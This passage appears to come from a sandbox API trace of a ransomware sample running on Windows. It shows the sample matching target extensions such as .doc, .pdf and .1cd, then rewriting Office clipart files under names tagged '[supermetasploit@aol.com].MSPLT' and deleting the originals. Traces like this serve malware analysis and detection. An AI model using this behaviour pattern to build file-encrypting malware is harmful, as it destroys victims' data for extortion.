returned 4 [0319.112] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.112] lstrlenW (lpString=".bz2") returned 4 [0319.112] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.113] lstrlenW (lpString=".7z") returned 3 [0319.113] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.113] lstrlenW (lpString=".dbf") returned 4 [0319.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.113] lstrlenW (lpString=".1cd") returned 4 [0319.113] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.113] lstrlenW (lpString=".jpg") returned 4 [0319.113] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.534] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.534] lstrlenW (lpString=".doc") returned 4 [0319.535] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString=".docx") returned 5 [0319.535] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.535] lstrlenW (lpString=".pdf") returned 4 [0319.535] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString=".xls") returned 4 [0319.535] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.535] lstrlenW (lpString=".xlsx") returned 5 [0319.535] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.535] lstrlenW (lpString=".ppt") returned 4 [0319.535] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.535] lstrlenW (lpString=".zip") returned 4 [0319.535] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.535] lstrlenW (lpString=".rar") returned 4 [0319.535] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString=".bz2") returned 4 [0319.535] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString=".7z") returned 3 [0319.535] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.535] lstrlenW (lpString=".dbf") returned 4 [0319.535] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.535] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.535] lstrlenW (lpString=".1cd") returned 4 [0319.535] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.536] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00256_.WMF") returned 68 [0319.536] lstrlenW (lpString=".jpg") returned 4 [0319.536] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.536] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.536] lstrlenW (lpString="DD00407_.WMF") returned 12 [0319.536] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.552] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=7828) returned 1 [0319.553] CloseHandle (hObject=0x534) returned 1 [0319.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf")) returned 0x220 [0319.561] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.562] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.562] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x548 [0319.563] GetLastError () returned 0x0 [0319.563] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x1e94, lpOverlapped=0x0) returned 1 [0319.570] WriteFile (in: hFile=0x548, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x1ea0, lpOverlapped=0x0) returned 1 [0319.572] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.572] WriteFile (in: hFile=0x548, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.572] SetEndOfFile (hFile=0x548) returned 1 [0319.573] CloseHandle (hObject=0x548) returned 1 [0319.578] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.578] SetEndOfFile (hFile=0x534) returned 1 [0319.582] CloseHandle (hObject=0x534) returned 1 [0319.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.583] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0319.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.584] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.584] lstrlenW (lpString=".doc") returned 4 [0319.584] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.584] lstrlenW (lpString=".docx") returned 5 [0319.584] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.584] lstrlenW (lpString=".pdf") returned 4 [0319.584] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.584] lstrlenW (lpString=".xls") returned 4 [0319.585] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.585] lstrlenW (lpString=".xlsx") returned 5 [0319.585] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.585] lstrlenW (lpString=".ppt") returned 4 [0319.585] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString=".zip") returned 4 [0319.585] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.585] lstrlenW (lpString=".rar") returned 4 [0319.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString=".bz2") returned 4 [0319.585] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString=".7z") returned 3 [0319.585] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString=".dbf") returned 4 [0319.585] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString=".1cd") returned 4 [0319.585] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString=".jpg") returned 4 [0319.585] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.585] lstrlenW (lpString=".doc") returned 4 [0319.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString=".docx") returned 5 [0319.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.586] lstrlenW (lpString=".pdf") returned 4 [0319.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString=".xls") returned 4 [0319.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.586] lstrlenW (lpString=".xlsx") returned 5 [0319.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.586] lstrlenW (lpString=".ppt") returned 4 [0319.586] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.586] lstrlenW (lpString=".zip") returned 4 [0319.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.586] lstrlenW (lpString=".rar") returned 4 [0319.586] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString=".bz2") returned 4 [0319.586] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString=".7z") returned 3 [0319.586] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.586] lstrlenW (lpString=".dbf") returned 4 [0319.586] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.586] lstrlenW (lpString=".1cd") returned 4 [0319.586] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 68 [0319.587] lstrlenW (lpString=".jpg") returned 4 [0319.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.587] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.587] lstrlenW (lpString="DD00414_.WMF") returned 12 [0319.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.588] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=42908) returned 1 [0319.588] CloseHandle (hObject=0x534) returned 1 [0319.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf")) returned 0x220 [0319.588] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.589] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.589] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x554 [0319.589] GetLastError () returned 0x0 [0319.590] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0xa79c, lpOverlapped=0x0) returned 1 [0319.598] WriteFile (in: hFile=0x554, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xa7a0, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xa7a0, lpOverlapped=0x0) returned 1 [0319.600] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.600] WriteFile (in: hFile=0x554, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.601] SetEndOfFile (hFile=0x554) returned 1 [0319.601] CloseHandle (hObject=0x554) returned 1 [0319.606] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.606] SetEndOfFile (hFile=0x534) returned 1 [0319.630] CloseHandle (hObject=0x534) returned 1 [0319.630] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.630] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00414_.wmf")) returned 1 [0319.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.631] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.631] lstrlenW (lpString=".doc") returned 4 [0319.631] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.631] lstrlenW (lpString=".docx") returned 5 [0319.631] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.631] lstrlenW (lpString=".pdf") returned 4 [0319.631] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.631] lstrlenW (lpString=".xls") returned 4 [0319.631] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.631] lstrlenW (lpString=".xlsx") returned 5 [0319.631] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.632] lstrlenW (lpString=".ppt") returned 4 [0319.632] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString=".zip") returned 4 [0319.632] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.632] lstrlenW (lpString=".rar") returned 4 [0319.632] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString=".bz2") returned 4 [0319.632] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString=".7z") returned 3 [0319.632] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString=".dbf") returned 4 [0319.632] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString=".1cd") returned 4 [0319.632] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString=".jpg") returned 4 [0319.632] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.632] lstrlenW (lpString=".doc") returned 4 [0319.632] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.632] lstrlenW (lpString=".docx") returned 5 [0319.632] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.632] lstrlenW (lpString=".pdf") returned 4 [0319.633] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString=".xls") returned 4 [0319.633] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.633] lstrlenW (lpString=".xlsx") returned 5 [0319.633] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.633] lstrlenW (lpString=".ppt") returned 4 [0319.633] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.633] lstrlenW (lpString=".zip") returned 4 [0319.633] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.633] lstrlenW (lpString=".rar") returned 4 [0319.633] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString=".bz2") returned 4 [0319.633] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString=".7z") returned 3 [0319.633] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.633] lstrlenW (lpString=".dbf") returned 4 [0319.633] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.633] lstrlenW (lpString=".1cd") returned 4 [0319.633] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0319.633] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00414_.WMF") returned 68 [0319.633] lstrlenW (lpString=".jpg") returned 4 [0319.633] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0319.634] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0319.634] lstrlenW (lpString="DD00437_.WMF") returned 12 [0319.634] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.635] GetFileSizeEx (in: hFile=0x534, lpFileSize=0x2d4ff14 | out: lpFileSize=0x2d4ff14*=1932) returned 1 [0319.635] CloseHandle (hObject=0x534) returned 1 [0319.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf")) returned 0x220 [0319.635] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0319.635] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x534 [0319.636] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.636] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.636] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x538 [0319.637] GetLastError () returned 0x0 [0319.637] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x78c, lpOverlapped=0x0) returned 1 [0319.639] WriteFile (in: hFile=0x538, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0x790, lpOverlapped=0x0) returned 1 [0319.641] ReadFile (in: hFile=0x534, lpBuffer=0x3b99020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d4fecc, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesRead=0x2d4fecc*=0x0, lpOverlapped=0x0) returned 1 [0319.641] WriteFile (in: hFile=0x538, lpBuffer=0x3b99020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d4fc94, lpOverlapped=0x0 | out: lpBuffer=0x3b99020*, lpNumberOfBytesWritten=0x2d4fc94*=0xec, lpOverlapped=0x0) returned 1 [0319.641] SetEndOfFile (hFile=0x538) returned 1 [0319.642] CloseHandle (hObject=0x538) returned 1 [0319.642] SetFilePointerEx (in: hFile=0x534, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d4fec0 | out: lpNewFilePointer=0x0) returned 1 [0319.642] SetEndOfFile (hFile=0x534) returned 1 [0319.649] CloseHandle (hObject=0x534) returned 1 [0319.650] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0319.650] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00437_.wmf")) returned 1 [0319.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.651] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.651] lstrlenW (lpString=".doc") returned 4 [0319.651] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0319.651] lstrlenW (lpString=".docx") returned 5 [0319.651] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0319.652] lstrlenW (lpString=".pdf") returned 4 [0319.652] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString=".xls") returned 4 [0319.652] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0319.652] lstrlenW (lpString=".xlsx") returned 5 [0319.652] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0319.652] lstrlenW (lpString=".ppt") returned 4 [0319.652] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00437_.WMF") returned 68 [0319.652] lstrlenW (lpString=".zip") returned 4 [0319.652] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0319.652] lstrlenW (lpString=".rar") returned 4 [0319.652] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString=".bz2") returned 4 [0319.652] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0319.652] lstrlenW (lpString=".7z") returned 3 [0319.652] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0319.652] 